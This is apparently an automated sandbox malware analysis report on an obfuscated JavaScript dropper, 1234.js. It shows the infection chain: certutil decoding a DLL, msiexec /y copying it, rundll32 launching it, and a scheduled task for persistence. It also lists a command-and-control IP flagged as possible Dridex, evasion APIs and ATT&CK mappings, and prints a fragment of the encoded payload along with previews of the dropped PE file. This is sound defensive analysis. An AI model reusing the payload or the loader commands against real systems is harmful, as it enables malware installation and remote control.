AAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAIPBArhWVVVV9+mLwsHoHwPQjQSVAQAAAMPMzMzM');t0=t0.concat('zMzMSIlcJAhIiXQkEEiJfCQYQY1A/kUz0kiL+kiYSIvZTI');t0=t0.concat('vJSI01yEMBAEiFwA+Ok');t0=t0.concat('AAAAEyNUP9MjVoBSLir');t0=t0.concat('qqqqqqqqqkn34kjR6kj/wkSNFFJBD7ZD/0mDwQR');t0=t0.concat('NjVsDSMHoAg+2BDBBiEH8QQ++');t0=t0.concat('Q/yD4APB4ARIY8hBD7ZD/cHoBEgLyA+2BDFBiEH9QQ++Q/2D4A/B4');t0=t0.concat('AJIY8hBD7ZD/kjB6AZIC8gPtgQxQYhB/kkPvkP+g+A/D7YE');t0=t0.concat('MEGIQf9I/8p1j0U70H1ySWPSSAPXD7YCSMHoAg+');t0=t0.concat('2BDBBiAFBjUD/RDvQD74CdReD4APB4ARImA+2BDBBiEEB');t0=t0.concat('QcZBAj3rL4PgA8HgB');t0=t0.concat('EhjyA+2QgHB6ARIC8gPtgQxQYhBAQ+');t0=t0.concat('+QgGD4A/B4AJImA+2BDBBiEECSYPBA0');t0=t0.concat('n/wUHGQf89SIt0JBBIi3wkGEHGAQBMK8tIi1wkCEmNQQHDzMzMzM');t0=t0.concat('zMzMzMzMzMzEiJXCQISIl0JBBI');t0=t0.concat('iXwkGEGNQP5FM9JIi/pImEiL2UyLyUiNNbhCAQBIh');t0=t0.concat('cAPjpAAAABMjVD/TI1aAUi4q6qqqqqqqqpJ9+J');t0=t0.concat('I0epI/8JEjRRSQQ+2Q/9Jg8E
Source: 1234.jsInitial file: High amount of function use 7
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose,11_2_00007FFE1A5113A0
Source: 1234.jsArray : entropy: 5.18, length: 17418, content: '|LJAAA8AAA''(\x27pm\x27);t0=''Zvcm1hdG|d''ol1hIl0JHh''BIjRVRuAAA''Xb/Xa\x27);t0''ACjMAQABIw''a\x27)Go to definition
Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\AppData\Local\Temp\rad00257.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Tyrannosaurus Tech\Updater.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Tyrannosaurus Tech\Updater.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Tasks\Tyrannosaurus Tech.jobJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownProcess created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: unknownProcess created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A515E70 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,11_2_00007FFE1A515E70
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_11-7382
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\certutil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rad00257.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\ProgramData\Tyrannosaurus Tech\Updater.dllJump to dropped file
Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose,11_2_00007FFE1A5113A0
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A511870 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,11_2_00007FFE1A511870
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51E994 IsDebuggerPresent,__crtUnhandledException,11_2_00007FFE1A51E994
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A52036C EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00007FFE1A52036C
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose,11_2_00007FFE1A5113A0
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51B5A8 GetProcessHeap,11_2_00007FFE1A51B5A8
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51C538 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FFE1A51C538

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.161.251.26 443Jump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51BDA8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00007FFE1A51BDA8
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A5145E0 GetVolumeInformationW,GetModuleHandleW,GetComputerNameW,GetModuleHandleW,GetComputerNameExW,GetModuleHandleW,GetUserNameW,GetModuleHandleW,OpenMutexW,CloseHandle,GetModuleHandleW,GetTickCount,SleepEx,11_2_00007FFE1A5145E0
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A515A20 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,GetSystemInfo,GetSystemMetrics,11_2_00007FFE1A515A20
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information33
Scripting
Valid Accounts2
Scheduled Task/Job
33
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
12
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Native API
2
Scheduled Task/Job
2
Scheduled Task/Job
11
Process Injection
LSASS Memory31
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Data Encoding
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
Security Account Manager1
Account Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
System Owner/User Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials15
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
1234.js0%ReversingLabs
SourceDetectionScannerLabelLink
C:\ProgramData\Tyrannosaurus Tech\Updater.dll8%ReversingLabsWin64.Malware.Generic
C:\Users\user\AppData\Local\Temp\rad00257.tmp8%ReversingLabsWin64.Malware.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://185.161.251.26/O&=rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
    https://185.161.251.26/rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://185.161.251.26/0rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        https://185.161.251.26/Prundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://185.161.251.26/Irundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://185.161.251.26/nfoEx2rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              185.161.251.26
              unknownUnited Kingdom
              5089NTLGBtrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1541406
              Start date and time:2024-10-24 19:47:13 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 12s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:12
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • GSI enabled (Javascript)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:1234.js
              Detection:MAL
              Classification:mal76.evad.winJS@8/4@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 20
              • Number of non-executed functions: 25
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 1234.js
              TimeTypeDescription
              13:50:10API Interceptor1x Sleep call for process: msiexec.exe modified
              13:50:13API Interceptor1x Sleep call for process: rundll32.exe modified
              18:48:40Task SchedulerRun new task: {65430329-E14B-45C7-815F-1545FB9EBEE9} path: certutil s>-decode rad603BF.tmp rad00257.tmp
              18:48:40Task SchedulerRun new task: {D7AC511B-6643-49BE-900E-4E0C51F57196} path: msiexec s>/y C:\Users\user\AppData\Local\Temp\rad00257.tmp
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              185.161.251.26Updater.dll.dllGet hashmaliciousUnknownBrowse
                Updater.dll.dllGet hashmaliciousUnknownBrowse
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  NTLGBnewsampleGet hashmaliciousMirai, OkiruBrowse
                  • 217.137.58.145
                  Updater.dll.dllGet hashmaliciousUnknownBrowse
                  • 185.161.251.26
                  Updater.dll.dllGet hashmaliciousUnknownBrowse
                  • 185.161.251.26
                  o2YUBeMZW6.elfGet hashmaliciousMiraiBrowse
                  • 86.8.111.22
                  G63E6opeS8.elfGet hashmaliciousMiraiBrowse
                  • 62.253.81.1
                  ai3eCONS9Q.elfGet hashmaliciousMiraiBrowse
                  • 62.31.100.51
                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                  • 80.5.205.110
                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                  • 86.13.197.104
                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                  • 86.1.9.11
                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                  • 82.10.79.183
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  51c64c77e60f3980eea90869b68c58a8Updater.dll.dllGet hashmaliciousUnknownBrowse
                  • 185.161.251.26
                  Updater.dll.dllGet hashmaliciousUnknownBrowse
                  • 185.161.251.26
                  xxJfSec58P.exeGet hashmaliciousVidarBrowse
                  • 185.161.251.26
                  UMrFwHyjUi.exeGet hashmaliciousVidarBrowse
                  • 185.161.251.26
                  b157p9L0c1.exeGet hashmaliciousVidarBrowse
                  • 185.161.251.26
                  PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                  • 185.161.251.26
                  46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                  • 185.161.251.26
                  7ZthFNAqYp.exeGet hashmaliciousVidarBrowse
                  • 185.161.251.26
                  M8PoiLFYWM.exeGet hashmaliciousVidarBrowse
                  • 185.161.251.26
                  Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                  • 185.161.251.26
                  No context
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):132096
                  Entropy (8bit):6.07698299320588
                  Encrypted:false
                  SSDEEP:3072:Jhw2Pja55J8hTGMjctYnc/F5ipfVMFY1lz:Jhwv55WT7ctiiF5cv
                  MD5:80CD37D9EB33507BF054F32CE2380B09
                  SHA1:6E8D57DDE537ACE0639931569AE2B04B9CB99A26
                  SHA-256:F47144C7159BE31D8116FDC36B66CB72C917CD91A4BBE9EAA55DEC929C1CFFDD
                  SHA-512:18F42496C4A66F11AA834E1DB7F727EA7041882408A83BE00F5DDACFBCA439DEBE611F24EADD19E9453BC774D91D33D98AC25290791D501AF2E706DC9EF89BDE
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 8%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h.$[.........." .....4...................................................p............`.........................................P................P.......0..p............`......................................P...p............P...............................text...42.......4.................. ..`.rdata.......P.......8..............@..@.data....?..........................@....pdata..p....0......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\certutil.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):132096
                  Entropy (8bit):6.07698299320588
                  Encrypted:false
                  SSDEEP:3072:Jhw2Pja55J8hTGMjctYnc/F5ipfVMFY1lz:Jhwv55WT7ctiiF5cv
                  MD5:80CD37D9EB33507BF054F32CE2380B09
                  SHA1:6E8D57DDE537ACE0639931569AE2B04B9CB99A26
                  SHA-256:F47144C7159BE31D8116FDC36B66CB72C917CD91A4BBE9EAA55DEC929C1CFFDD
                  SHA-512:18F42496C4A66F11AA834E1DB7F727EA7041882408A83BE00F5DDACFBCA439DEBE611F24EADD19E9453BC774D91D33D98AC25290791D501AF2E706DC9EF89BDE
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 8%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h.$[.........." .....4...................................................p............`.........................................P................P.......0..p............`......................................P...p............P...............................text...42.......4.................. ..`.rdata.......P.......8..............@..@.data....?..........................@....pdata..p....0......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\wscript.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):176130
                  Entropy (8bit):5.072583471283548
                  Encrypted:false
                  SSDEEP:3072:p5iLDOXI96FfMKwPbKY1SW2NTP+igGw2unRXgX4un/M5FsmpyCypLoDMScTV10jI:p5ifOXIsfMdjKY1SW2NTP+i0IXnWsmMZ
                  MD5:5C91300ACF12FA101D7741CB94460BE3
                  SHA1:38EEBC11F2500C9B5F71A196448C113C1C5A0AA4
                  SHA-256:54348D3F893581E89C38C677AE8EFA411FFAC1AE015B8CEC599C30292B509407
                  SHA-512:F772E78FA8A24BD28CB1D17989B33E89AD82837E4973C94A82CFBBEDD4B7ABF30CEEF1BEC143308499D6434CA24EEE2E9B34BC4174FA8265F6258E82E52736D7
                  Malicious:false
                  Reputation:low
                  Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYGAGiDJFsAAAAAAAAAAPAAIiALAgwAADQBAADyAAAAAAAAvIoAAAAQAAAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAABwAgAABAAAAAAAAAIAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAUNoBALgAAAAI2wEAjAAAAABQAgDgAQAAADACAHARAAAAAAAAAAAAAABgAgDABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQxQEAcAAAAAAAAAAAAAAAAFABAJADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAADQyAQAAEAAAADQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAC4lgAAAFABAACYAAAAOAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAuD8AAADwAQAAGgAAANABAAAAAAAAAAAAAAAAAEAAAMAucGRhdGEAAHARAAAAMAIAABIAAADqAQAAAAAAAAAAAAAAAABAAABALnJzcmMAAADgAQAAAFACAAACAAAA/AEAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAwAUAAABgAgAABgAAAP4BAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):352
                  Entropy (8bit):3.5679561447062436
                  Encrypted:false
                  SSDEEP:6:Z4djt/82On+SkSJkJAWhAlAtebhEZDvAJDiAjgsW2YRZuy0lpn1:uthO+fTWljbruAjzvYRQVp1
                  MD5:C55CE93EEE0F61144FC37E50CBAEB2B2
                  SHA1:0CFB9BF261E7C51D6AAA879A1670B8C7EBD6563C
                  SHA-256:72859B2FCABBFB69399D1C8A82EC4BED07B4CEAA83E8954CF9975ED5F991FB43
                  SHA-512:1A1B2C35B3D3B99CB122CFC83616953629F7B618454F99623624B9EA8ABB49D5000F5BE07EA90D95708AB7103588421F0B387BC541F4242A0999876E5DCB32AA
                  Malicious:false
                  Preview:......._.<O.......F.......<... .....\.......... ....................!.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.r.u.n.d.l.l.3.2...e.x.e...9.".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.T.y.r.a.n.n.o.s.a.u.r.u.s. .T.e.c.h.\.U.p.d.a.t.e.r...d.l.l.".,.S.t.a.r.t. ./.u.......J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................3.............................
                  File type:ASCII text, with very long lines (65536), with no line terminators
                  Entropy (8bit):5.257062743918368
                  TrID:
                    File name:1234.js
                    File size:731'296 bytes
                    MD5:7dea02845300c31f60e21494c492c870
                    SHA1:8ebbbeeb723eea278a343e95d1243577c445845b
                    SHA256:9b38cc509b1a4a401275bcb5e896917c842431f9190c417147c35b20b99c4d85
                    SHA512:311e25c9cd9523bb3c27f54a047800ad14461b130a976680bcd4aaf18822031fc803ba53501e8694a9c15e5fc3f097d1ad30be5cca98021563080850f82f4d0c
                    SSDEEP:12288:KevpQrCCUXwreRfwt9lZuldlSzC0R7rgFC:K2pQrTUXwrgo1ZUVWXgFC
                    TLSH:27F48224370079B927D70BF3FE5070D299045E8E754841BBA64B7B7ABD4E4A0E9B2C72
                    File Content Preview:function a0_0x31b0(_0x189288,_0x24a2a1){var _0x22e077=a0_0x22e0();return a0_0x31b0=function(_0x31b09f,_0x5b8e46){_0x31b09f=_0x31b09f-0x78;var _0x404deb=_0x22e077[_0x31b09f];return _0x404deb;},a0_0x31b0(_0x189288,_0x24a2a1);}function a0_0x22e0(){var _0x5e8
                    Icon Hash:68d69b8bb6aa9a86
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-10-24T19:50:13.785415+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.450002185.161.251.26443TCP
                    2024-10-24T19:50:14.836595+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.450003185.161.251.26443TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Oct 24, 2024 19:50:12.907144070 CEST50002443192.168.2.4185.161.251.26
                    Oct 24, 2024 19:50:12.907246113 CEST44350002185.161.251.26192.168.2.4
                    Oct 24, 2024 19:50:12.907351971 CEST50002443192.168.2.4185.161.251.26
                    Oct 24, 2024 19:50:12.917155027 CEST50002443192.168.2.4185.161.251.26
                    Oct 24, 2024 19:50:12.917191982 CEST44350002185.161.251.26192.168.2.4
                    Oct 24, 2024 19:50:13.785280943 CEST44350002185.161.251.26192.168.2.4
                    Oct 24, 2024 19:50:13.785414934 CEST50002443192.168.2.4185.161.251.26
                    Oct 24, 2024 19:50:13.848578930 CEST50002443192.168.2.4185.161.251.26
                    Oct 24, 2024 19:50:13.848865986 CEST44350002185.161.251.26192.168.2.4
                    Oct 24, 2024 19:50:13.848937988 CEST50002443192.168.2.4185.161.251.26
                    Oct 24, 2024 19:50:13.959774971 CEST50003443192.168.2.4185.161.251.26
                    Oct 24, 2024 19:50:13.959804058 CEST44350003185.161.251.26192.168.2.4
                    Oct 24, 2024 19:50:13.959904909 CEST50003443192.168.2.4185.161.251.26
                    Oct 24, 2024 19:50:13.971267939 CEST50003443192.168.2.4185.161.251.26
                    Oct 24, 2024 19:50:13.971287012 CEST44350003185.161.251.26192.168.2.4
                    Oct 24, 2024 19:50:14.836410046 CEST44350003185.161.251.26192.168.2.4
                    Oct 24, 2024 19:50:14.836595058 CEST50003443192.168.2.4185.161.251.26

                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:13:48:04
                    Start date:24/10/2024
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js"
                    Imagebase:0x7ff713c50000
                    File size:170'496 bytes
                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:13:48:40
                    Start date:24/10/2024
                    Path:C:\Windows\System32\certutil.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
                    Imagebase:0x7ff72fcc0000
                    File size:1'651'712 bytes
                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:5
                    Start time:13:48:40
                    Start date:24/10/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:6
                    Start time:13:48:40
                    Start date:24/10/2024
                    Path:C:\Windows\System32\msiexec.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
                    Imagebase:0x7ff7c3690000
                    File size:69'632 bytes
                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:8
                    Start time:13:49:40
                    Start date:24/10/2024
                    Path:C:\Windows\System32\certutil.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
                    Imagebase:0x7ff72fcc0000
                    File size:1'651'712 bytes
                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:9
                    Start time:13:49:40
                    Start date:24/10/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:10
                    Start time:13:50:10
                    Start date:24/10/2024
                    Path:C:\Windows\System32\msiexec.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
                    Imagebase:0x7ff7c3690000
                    File size:69'632 bytes
                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:11
                    Start time:13:50:12
                    Start date:24/10/2024
                    Path:C:\Windows\System32\rundll32.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u
                    Imagebase:0x7ff667060000
                    File size:71'680 bytes
                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                    Has elevated privileges:false
                    Has administrator privileges:false
